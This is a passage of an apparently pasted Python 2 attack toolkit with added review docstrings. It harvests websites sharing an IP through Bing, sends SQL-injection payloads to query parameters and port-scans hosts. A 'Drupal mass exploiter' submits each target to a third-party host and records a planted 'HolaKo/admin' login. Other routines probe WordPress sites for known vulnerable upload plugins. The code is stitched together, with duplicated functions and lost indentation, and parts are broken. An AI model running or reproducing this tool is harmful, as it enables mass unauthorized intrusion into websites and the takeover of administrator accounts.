                    lista.append(x)
            except:
                pass
            page += 50
        lista = unique(lista)
        self.checkSqli(lista)
    ############################
    #scan for sql injection
    def checkSqli(self, s):
        """Append each payload to every query parameter of each URL in *s* and match DB error text.

        ``url.replace(param, param + payload)`` replaces every occurrence of
        the parameter text in the URL, not only the one in the query string.
        A URL without '?' raises IndexError on the split; that and every
        other error for the URL are swallowed by the bare ``except:``.  The
        signature regex is credited by the original author to the webpwn3r
        project.
        """
        clearScr()
        print "[~] Checking SQL injection"
        payloads = ["3'", "3%5c", "3%27%22%28%29", "3'><", "3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%2500%3E%25bf%2527%27"]
        check = re.compile("Incorrect syntax|mysql_fetch|Syntax error|Unclosed.+mark|unterminated.+qoute|SQL.+Server|Microsoft.+Database|Fatal.+error", re.I)
        for url in s:
            try:
                for param in url.split('?')[1].split('&'):
                    for payload in payloads:
                        power = url.replace(param, param + payload.strip())
                        html = urllib2.urlopen(power).readlines()
                        for line in html:
                            checker = re.findall(check, line)
                            if len(checker) != 0 :
                                print ' [*] SQLi found -> ', power
            except:
                pass
    ############################
    ############################
    #scan for ports
    def portScanner(self, mode, ran) :
        """TCP connect scan of ``self.serverip``.

        mode 1 scans ``range(start, end)`` parsed from the 'a-b' string
        *ran*; the upper bound is excluded.  mode 2 scans a fixed list of
        nine ports and ignores *ran*.  ``connect_ex``'s integer result
        overwrites the socket object, so the socket is never closed, and
        with ``settimeout`` commented out each connect blocks for the OS
        default.  Malformed *ran* raises ValueError/IndexError.
        """
        clearScr()
        print "[~] Scanning Ports"
        def do_it(ip, port):
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            #sock.settimeout(5)
            # sock now holds connect_ex's errno (0 on success), not the socket.
            sock = sock.connect_ex((ip,port))
            if sock == 0:
                print " [*] Port %i is open" % port

        if mode == 1 :
            a = ran.split('-')
            start = int(a[0])
            end = int(a[1])
            for i in range(start, end):
                do_it(self.serverip, i)
        elif mode == 2 :
            for port in [80,21,22,2082,25,53,110,443,143] :
                # didn't use multithreading cos it's few ports
                do_it(self.serverip, port)
  851. ############################
# Choice list for the Drupal sub-menu; printed by maine().
minu = """
\t 1: Drupal Bing Exploiter
\t 2: Get Drupal Websites
\t 3: Drupal Mass Exploiter
\t 99: Back To Main Menu
"""
  858.  
  859.  
  860. #Definition Of Drupal Bing Expoliter
def drupal():
    '''Query Bing for sites on an IP and submit each hostname to a third-party "checker".

    NOTE(review): every hostname found is sent as a query parameter to a
    remote host (crig-alda.ro) whose behaviour is not visible in this file;
    the operator's entire target list is therefore disclosed to whoever
    runs that host.  ``user`` and ``pwd`` are never defined in this
    function, so the second ``a.write`` raises NameError, which the broad
    ``except`` prints; the file object is never closed.  The paste has lost
    its indentation; ``sys.exit(0)`` is placed here as the function's final
    statement, where it ends the whole program.
    '''
    ip = raw_input('1- IP : ')
    page = 1
    while page <= 50 :

        url = "http://www.bing.com/search?q=ip%3A"+ip+"&go=Valider&qs=n&form=QBRE&pq=ip%3A"+ip+"&sc=0-0&sp=-1&sk=&cvid=af529d7028ad43a69edc90dbecdeac4f&first="+str(page)
        req = urllib2.Request(url)
        opreq = urllib2.urlopen(req).read()
        findurl = re.findall('<div class="b_title"><h2><a href="(.*?)" h=',opreq)
        # Steps by 1 here, unlike the other Bing loops in this file (50).
        page += 1

        for url in findurl :
            try :

                urlpa = urlparse(url)
                site = urlpa.netloc

                print "[+] Testing At "+site
                resp = urllib2.urlopen('http://crig-alda.ro/wp-admin/css/index2.php?url='+site+'&submit=submit')
                read=resp.read()
                if "User : HolaKo" in read:
                    print "Exploit found =>"+site

                    print "user:HolaKo\npass:admin"
                    a = open('up.txt','a')
                    a.write(site+'\n')
                    # 'user' and 'pwd' are undefined: NameError, caught below.
                    a.write("user:"+user+"\npass:"+pwd+"\n")
                else :
                    print "[-] Expl Not Found :( "

            except Exception as ex :
                print ex
    sys.exit(0)
  896.  
  897.  
  898. #Drupal Server ExtraCtor
def getdrupal():
    """Print the distinct hostnames Bing returns for ``ip:<ip> node``.

    Pages 1..50 of Bing results are fetched with no error handling, so a
    URLError propagates to the caller.  ``sites`` is local and only used
    for de-duplication; nothing is returned.
    """
    ip = raw_input('Enter The Ip : ')
    page = 1
    sites = list()
    while page <= 50 :

        url = "http://www.bing.com/search?q=ip%3A"+ip+"+node&go=Valider&qs=ds&form=QBRE&first="+str(page)
        req = urllib2.Request(url)
        opreq = urllib2.urlopen(req).read()
        findurl = re.findall('<div class="b_title"><h2><a href="(.*?)" h=',opreq)
        page += 1

        for url in findurl :
            split = urlparse(url)
            site = split.netloc
            if site not in sites :
                print site
                sites.append(site)
  917.  
  918.  
  919. #Drupal Mass List Exploiter
def drupallist():
    """Read URLs from a text file and submit each to the same third-party "checker" as ``drupal``.

    NOTE(review): every URL in the list is sent to crig-alda.ro; see the
    note on ``drupal``.  Neither ``fileopen`` nor ``save`` is ever closed
    (``save`` is re-opened in append mode on every hit).  The "not found"
    message prints ``i``, the raw line including its trailing newline,
    rather than the stripped ``url``.
    """
    listop = raw_input("Enter The list Txt :")
    fileopen = open(listop,'r')
    content = fileopen.readlines()
    for i in content :
        url=i.strip()
        try :
            openurl = urllib2.urlopen('http://crig-alda.ro/wp-admin/css/index2.php?url='+url+'&submit=submit')
            readcontent = openurl.read()
            if "Success" in readcontent :
                print "[+]Success =>"+url
                print "[-]username:HolaKo\n[-]password:admin"
                save = open('drupal.txt','a')
                save.write(url+"\n"+"[-]username:HolaKo\n[-]password:admin\n")

            else :
                print i + "=> exploit not found "
        except Exception as ex :
            print ex
def maine():
    """Drupal sub-menu: print ``minu``, read one choice, then loop.

    The choice is read once, before the loop; each iteration re-runs the
    chosen action and then asks whether to continue.  'N...' exits the
    process, 'Y...' recurses into a fresh ``maine``, anything else repeats
    the same choice.  ``con[0]`` raises IndexError on an empty answer.
    ``about`` is not defined above this point in the file.
    """
    print(minu)
    choose = raw_input("choose a number :")
    while True :
        if choose == "1":
            drupal()
        elif choose == "2":
            getdrupal()
        elif choose == "3":
            drupallist()
        elif choose == "4":
            about()
        elif choose == "99":
            menu()
        con = raw_input('Continue [Y/n] -> ')
        first = con[0].upper()
        if first == 'N' :
            exit()
        if first == 'Y' :
            maine()
def unique(seq):
    """Return the hashable elements of *seq* in first-seen order without duplicates.

    Third, final and therefore effective definition of ``unique`` in this
    file; the two earlier ones have the same body.
    """
    seen = set()
    kept = []
    for element in seq:
        if element not in seen:
            kept.append(element)
            seen.add(element)
    return kept
def bing_all_grabber(s):
    """Return de-duplicated 'http://host/' URLs that Bing lists for IP string *s*.

    Identical to the earlier definition of the same name; being last, this
    is the one bound at import time.  ``page += 50`` is inside the ``try``,
    so a request that keeps raising URLError is retried indefinitely.
    """
    lista = []
    page = 1
    while page <= 101:
        try:
            bing = "http://www.bing.com/search?q=ip%3A" + s + "+&count=50&first=" + str(page)
            openbing = urllib2.urlopen(bing)
            readbing = openbing.read()
            findwebs = re.findall('<h2><a href="(.*?)"', readbing)
            for i in range(len(findwebs)):
                allnoclean = findwebs[i]
                findall1 = re.findall('http://(.*?)/', allnoclean)
                for idx, item in enumerate(findall1):
                    # Substring test, not a prefix test.
                    if 'www' not in item:
                        findall1[idx] = 'http://www.' + item + '/'
                    else:
                        findall1[idx] = 'http://' + item + '/'
                lista.extend(findall1)

            page += 50
        except urllib2.URLError:
            pass

    final = unique(lista)
    return final
def check_wordpress(sites) :
    """Return the subset of `sites` for which ``GET <site>wp-login.php``
    answers 200.

    `site` is used as a bare prefix, so it must already end in '/'.
    urllib2 follows redirects, so a 200 from a catch-all or redirected
    page also counts as a hit. The bare except swallows everything,
    KeyboardInterrupt included. This name is redefined later in the file.
    """
    wp = []
    for site in sites :
        try :
            if urllib2.urlopen(site+'wp-login.php').getcode() == 200 :
                wp.append(site)
        except :
            pass

    return wp
def check_joomla(sites) :
    """Return the subset of `sites` for which ``GET <site>administrator``
    answers 200.

    Same caveats as `check_wordpress`: `site` must end in '/', redirects
    are followed so false positives are likely, and the bare except hides
    every error (including KeyboardInterrupt).
    """
    joomla = []
    for site in sites :
        try :
            if urllib2.urlopen(site+'administrator').getcode() == 200 :
                joomla.append(site)
        except :
            pass

    return joomla
def wppjmla():
    """Prompt for an IP, collect hosts Bing indexes for it, and print which of
    them respond 200 to the WordPress login and Joomla administrator paths.

    Interactive; all output goes to stdout. Inherits the false-positive and
    error-hiding behaviour of `check_wordpress` / `check_joomla`.
    """

    ipp = raw_input('Enter Target IP: ')
    sites = bing_all_grabber(str(ipp))
    wordpress = check_wordpress(sites)
    joomla = check_joomla(sites)
    for ss in wordpress :
        print ss
    print '[+] Found ! ', len(wordpress), ' Wordpress Websites'
    print '-'*30+'\n'
    for ss in joomla :
        print ss


    print '[+] Found ! ', len(joomla), ' Joomla Websites'

    print '\n'
  1026. #initialise the tnscan function
class tnn():
    """Prompt for a target IP and hand it to `TNscan`.

    All work happens in ``__init__``; merely constructing the object runs
    the scan. `clearScr` and `TNscan` are not defined in this block.
    """
    def __init__(self):
        clearScr()
        aaa = raw_input("Target IP : ")
        TNscan(aaa)
  1032. ############################
class bcolors:
    """Colour-code holder referenced by the print statements.

    Every code is the empty string, so output is emitted uncoloured; the
    names exist only so the call sites keep working.
    """
    HEADER = OKBLUE = OKGREEN = WARNING = FAIL = ENDC = CYAN = ''
class colors():
    """Second colour-code holder; like `bcolors`, every attribute is '' so
    terminal output is plain text."""
    PURPLE = CYAN = DARKCYAN = BLUE = ''
    GREEN = YELLOW = RED = ''
    BOLD = ENDC = ''
def grabsqli(ip):
    """Search Bing for pages indexed under ``ip:<ip>`` together with the word
    "upload" (three result pages: first=1, 11, 21) and pass each result to
    `checksqli`, which looks for a file-upload form.

    Despite the name this does not test for SQL injection. Notes:
      - `response` is fetched and discarded; `checksqli` fetches the same URL
        again, so every result is requested twice.
      - ``str(sites).strip(i)`` builds a throwaway string and has no effect.
      - The outer bare ``except: pass`` hides every error, including
        KeyboardInterrupt, so a failed search silently ends the scan.
    """
    try :
        print bcolors.OKBLUE + "Check_Uplaod... "
        print '\n'

        page = 1
        while page <= 21:
            bing = "http://www.bing.com/search?q=ip%3A"+ip+"+upload&count=50&first="+str(page)
            openbing = urllib2.urlopen(bing)
            readbing = openbing.read()
            findwebs = re.findall('<h2><a href="(.*?)"' , readbing)
            sites = findwebs
            for i in sites :
                try :
                    response = urllib2.urlopen(i).read()
                    checksqli(i)
                except urllib2.HTTPError, e:
                    # No-op: the result of strip() is discarded.
                    str(sites).strip(i)

            page = page + 10
    except :
        pass
def checksqli(sqli):
    """Fetch `sqli` and print it when the body contains ``type="file"``
    (i.e. an upload form). Not an SQL-injection test despite the name.
    Network errors propagate to the caller.
    """
    responsetwo = urllib2.urlopen(sqli).read()
    find = re.findall('type="file"',responsetwo)
    if find:
        print(" Found ==> " + sqli)
def sqlscan():
    """Interactive wrapper: prompt for an IP and run `grabsqli` on it."""
    ip = raw_input('Enter IP : ')
    grabsqli(ip)
  1081. # found this code on stackoverflow.com/questions/19278877
def unique(seq):
    """Return *seq*'s elements in first-seen order, dropping repeats.

    Elements must be hashable; values that compare equal (``0``/``False``)
    are treated as one. This redefinition shadows the earlier `unique` in
    the file.
    """
    seen = set()

    def _first_sighting(value):
        # Records the value and reports whether this is its first appearance.
        if value in seen:
            return False
        seen.add(value)
        return True

    return [value for value in seq if _first_sighting(value)]
def bing_all_grabber(s):
    """Query Bing for pages indexed under ``ip:<s>`` across three result
    pages (first=1, 51, 101) and return the distinct ``http://host/``
    prefixes found, in first-seen order.

    Identical to the earlier definition of the same name (this one wins at
    import time). Notes:
      - `s` is concatenated into the query string unencoded.
      - Only ``http://`` links survive the second regex; https results drop out.
      - ``'www' not in item`` is a substring test, not a prefix test.
      - ``page += 50`` sits inside the try, so a URLError leaves `page`
        unchanged and the loop retries the same request indefinitely; any
        other exception propagates.
    """
    lista = []
    page = 1
    while page <= 101:
        try:
            bing = "http://www.bing.com/search?q=ip%3A" + s + "+&count=50&first=" + str(page)
            openbing = urllib2.urlopen(bing)
            readbing = openbing.read()
            findwebs = re.findall('<h2><a href="(.*?)"', readbing)
            for i in range(len(findwebs)):
                allnoclean = findwebs[i]
                # Non-greedy: captures only up to the first '/' after the scheme.
                findall1 = re.findall('http://(.*?)/', allnoclean)
                for idx, item in enumerate(findall1):
                    if 'www' not in item:
                        findall1[idx] = 'http://www.' + item + '/'
                    else:
                        findall1[idx] = 'http://' + item + '/'
                lista.extend(findall1)

            page += 50
        except urllib2.URLError:
            # Swallowed without advancing `page` -- see docstring.
            pass

    final = unique(lista)
    return final
def check_wordpress(sites) :
    """Return the subset of `sites` for which ``GET <site>wp-login.php``
    answers 200.

    Redefinition of the earlier `check_wordpress` (this one is in effect).
    `site` must already end in '/'; redirects are followed, so a 200 from a
    catch-all page counts as a hit; the bare except hides every error,
    KeyboardInterrupt included.
    """
    wp = []
    for site in sites :
        try :
            if urllib2.urlopen(site+'wp-login.php').getcode() == 200 :
                wp.append(site)
        except :
            pass

    return wp
def check_wpstorethemeremotefileupload(sites) :
    """Return the `sites` whose ``wp-content/themes/WPStore/upload/index.php``
    path answers 200.

    A 200 only says the path is served (redirects are followed, so it may be
    a catch-all page); it is not evidence of any particular behaviour. `site`
    must end in '/'; the bare except hides every error.
    """
    wpstorethemeremotefileupload = []
    for site in sites :
        try :
            if urllib2.urlopen(site+'wp-content/themes/WPStore/upload/index.php').getcode() == 200 :
                wpstorethemeremotefileupload.append(site)
        except :
            pass

    return wpstorethemeremotefileupload
def check_wpcontactcreativeform(sites) :
    """Return the `sites` whose
    ``wp-content/plugins/sexy-contact-form/includes/fileupload/index.php``
    path answers 200.

    Same caveats as the other ``check_wp*`` helpers: existence of the path
    only, redirects followed, `site` must end in '/', errors hidden.
    """
    wpcontactcreativeform = []
    for site in sites :
        try :
            if urllib2.urlopen(site+'wp-content/plugins/sexy-contact-form/includes/fileupload/index.php').getcode() == 200 :
                wpcontactcreativeform.append(site)
        except :
            pass

    return wpcontactcreativeform
def check_wplazyseoplugin(sites) :
    """Return the `sites` whose ``wp-content/plugins/lazy-seo/lazyseo.php``
    path answers 200.

    Same caveats as the other ``check_wp*`` helpers: existence of the path
    only, redirects followed, `site` must end in '/', errors hidden.
    """
    wplazyseoplugin = []
    for site in sites :
        try :
            if urllib2.urlopen(site+'wp-content/plugins/lazy-seo/lazyseo.php').getcode() == 200 :
                wplazyseoplugin.append(site)
        except :
            pass

    return wplazyseoplugin
def check_wpeasyupload(sites) :
    """Return the `sites` whose
    ``wp-content/plugins/easy-comment-uploads/upload-form.php`` path
    answers 200.

    Same caveats as the other ``check_wp*`` helpers: existence of the path
    only, redirects followed, `site` must end in '/', errors hidden.
    """
    wpeasyupload = []
    for site in sites :
        try :
            if urllib2.urlopen(site+'wp-content/plugins/easy-comment-uploads/upload-form.php').getcode() == 200 :
                wpeasyupload.append(site)
        except :
            pass

    return wpeasyupload
def check_wpsymposium(sites) :
    """Intended to return the `sites` whose
    ``wp-symposium/server/file_upload_form.php`` path answers 200.

    As written it always returns an empty list: the append targets the
    undefined name `wpsycmium`, so every hit raises NameError, which the
    bare except then swallows. Same prefix/redirect caveats as the other
    ``check_wp*`` helpers.
    """
    wpsymposium = []
    for site in sites :
        try :
            if urllib2.urlopen(site+'wp-symposium/server/file_upload_form.php').getcode() == 200 :
                # Typo: `wpsycmium` is not defined -> NameError, swallowed below.
                wpsycmium.append(site)
        except :
            pass

    return wpsymposium
def wpminiscanner():
    """Prompt for an IP, gather the hosts Bing indexes for it, run each
    ``check_wp*`` probe over them and print the results per probe.

    Interactive; all output goes to stdout. Each probe only reports that a
    path returned 200, so the printed lists carry the false-positive and
    error-hiding caveats of those helpers, and the symposium list is always
    empty because of the NameError inside `check_wpsymposium`. The last
    label reads "wp_sympsiup" as in the original string.
    """
    ip = raw_input('Enter IP : ')
    sites = bing_all_grabber(str(ip))
    wordpress = check_wordpress(sites)
    wpstorethemeremotefileupload = check_wpstorethemeremotefileupload(sites)
    wpcontactcreativeform = check_wpcontactcreativeform(sites)
    wplazyseoplugin = check_wplazyseoplugin(sites)
    wpeasyupload = check_wpeasyupload(sites)
    wpsymposium = check_wpsymposium(sites)
    for ss in wordpress :
        print ss
    print '[*] Found, ', len(wordpress), ' wordpress sites.'
    print '-'*30+'\n'
    for ss in wpstorethemeremotefileupload :
        print ss
    print '[*] Found, ', len(wpstorethemeremotefileupload), ' wp_storethemeremotefileupload exploit.'
    print '-'*30+'\n'
    for ss in wpcontactcreativeform :
        print ss
    print '[*] Found, ', len(wpcontactcreativeform), ' wp_contactcreativeform exploit.'
    print '-'*30+'\n'
    for ss in wplazyseoplugin :
        print ss
    print '[*] Found, ', len(wplazyseoplugin), ' wp_lazyseoplugin exploit.'
    print '-'*30+'\n'
    for ss in wpeasyupload :
        print ss
    print '[*] Found, ', len(wpeasyupload), ' wp_easyupload exploit.'
    print '-'*30+'\n'
    for ss in wpsymposium :
        print ss


    print '[*] Found, ', len(wpsymposium), ' wp_sympsiup exploit.'

    print '\n'
  1206. ############################
  1207. #begin :D
# Script entry point: when run directly, hand control to menu().
if __name__ == "__main__":
    menu()